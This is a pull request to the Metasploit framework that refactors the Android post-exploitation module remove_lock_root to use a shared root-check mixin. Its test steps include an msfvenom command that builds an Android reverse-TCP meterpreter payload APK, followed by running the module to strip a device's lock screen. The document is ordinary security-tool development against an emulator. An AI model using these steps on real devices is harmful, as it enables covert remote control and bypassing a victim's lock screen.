### PR TITLE
Properly check root for remove_lock_root (android post module)

### DIFF
--- a/lib/msf/core/post.rb
+++ b/lib/msf/core/post.rb
@@ -16,6 +16,7 @@ class Msf::Post < Msf::Module
   require 'msf/core/post/solaris'
   require 'msf/core/post/unix'
   require 'msf/core/post/windows'
+  require 'msf/core/post/android'
 
   include Msf::PostMixin
 

--- a/modules/post/android/manage/remove_lock_root.rb
+++ b/modules/post/android/manage/remove_lock_root.rb
@@ -4,11 +4,12 @@
 ##
 
 require 'msf/core'
-require 'rex'
+require 'msf/core/post/android'
 
 class Metasploit4 < Msf::Post
 
   include Msf::Post::Common
+  include Msf::Post::Android::Priv
 
   def initialize(info={})
     super( update_info( info, {
@@ -28,10 +29,9 @@ class Metasploit4 < Msf::Post
   end
 
   def run
-    id = cmd_exec('id')
-    unless id =~ /root/
-      #print_error("This module requires root permissions")
-      #return
+    unless is_root?
+      print_error("This module requires root permissions.")
+      return
     end
 
     %W{

--- a/modules/post/android/manage/remove_lock_root.rb
+++ b/modules/post/android/manage/remove_lock_root.rb
@@ -4,7 +4,6 @@
 ##
 
 require 'msf/core'
-require 'msf/core/post/android'
 
 class Metasploit4 < Msf::Post
 


### PR DESCRIPTION
This uses the Msf::Post::Android::Priv mixin for android post module remove_lock_root.

To verify:
- [x] Start an android emulator
- [x] `./msfvenom -p android/meterpreter/reverse_tcp lhost=IP lport=4444 -o /tmp/android.apk`
- [x] Start a handler for android/meterpreter/reverse_tcp in msfconsole
- [x] `tools/install_msf_apk.sh /tmp/android.apk`, this should install the meterpreter apk and give you a session.
- [x] At the meterpreter prompt, do `run post/android/manage/remove_lock_root`
- [x] You should get an error saying: "This module requires root permissions". If you're root, then you shouldn't see that error.
